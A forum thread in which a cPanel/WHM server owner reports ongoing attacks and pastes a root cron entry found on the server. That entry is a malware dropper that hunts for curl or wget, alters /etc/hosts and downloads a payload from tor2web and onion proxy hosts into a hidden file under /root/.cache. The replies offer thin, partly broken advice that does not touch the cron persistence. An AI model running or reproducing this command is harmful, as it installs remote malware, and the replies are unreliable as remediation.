cancel
Showing results for 
Show  only  | Search instead for 
Did you mean: 
Go to solution

Receiving TOR NETWORK attacks on my CPanel/WHM Linux Server

I'm receiving attacks on my server, every minute. The only information I got is the cron daemon reports from the server.

Find bellow:
Cron <root@pateng> tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi;  (${curl}  -fsSLk --retry 2 --connect-timeout 22 --max-time 75  https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -o /root/.cache/.ntp||${curl}  -fsSLk --retry 2 --connect-timeout 22 --max-time 75  https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -o /root/.cache/.ntp||${curl}  -fsSLk --retry 2 --connect-timeout 22 --max-time 75  https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o /root/.cache/.ntp||${wget}  --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75  https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /root/.cache/.ntp||${wget}  --quiet --tries=2 --wait=5 --no

I've already blocked more than 30 IPs on CPanel, and it still going!
I've even used htaccess to block all IP's except mine, and still nothing.

From the above information, I can extract the following domains:
https://an7kmd2wp4xo7hpr.tor2web.su
https://an7kmd2wp4xo7hpr.tor2web.io
https://an7kmd2wp4xo7hpr.onion.sh

On one of my searches, I've found something in a forum, about one of the CPanel plugins security hole being actively exploited in the last hours...

What can I do guys?

1 ACCEPTED SOLUTION

Thank you 

 

Zulfiqar Anees | Founder/CEO at FastTech Media, TechMag, TechKnowable, and ZulWeb | GoDaddy Pro.

View solution in original post

3 REPLIES 3
Resolver VI

Hello 

ou can permanently block the offending IP with this command (replace xxx.xxx.xxx.xxx with the attacker’s IP address.

 

If a software or dedicated hardware firewall isn’t available by your host, you can always harden Apache on your web server, which will prevent help your server identify and automatically block malicious connections like these. You’ll want to install the mod_reqtimeout module for Apache.

 

Zulfiqar Anees | Founder/CEO at FastTech Media, TechMag, TechKnowable, and ZulWeb | GoDaddy Pro.

I did install the mod_reqtimeout module, and it still going, now with more than a 2k emails from cron daemon...

Any other ideas?

Much appreciated!

Thank you 

 

Zulfiqar Anees | Founder/CEO at FastTech Media, TechMag, TechKnowable, and ZulWeb | GoDaddy Pro.

View solution in original post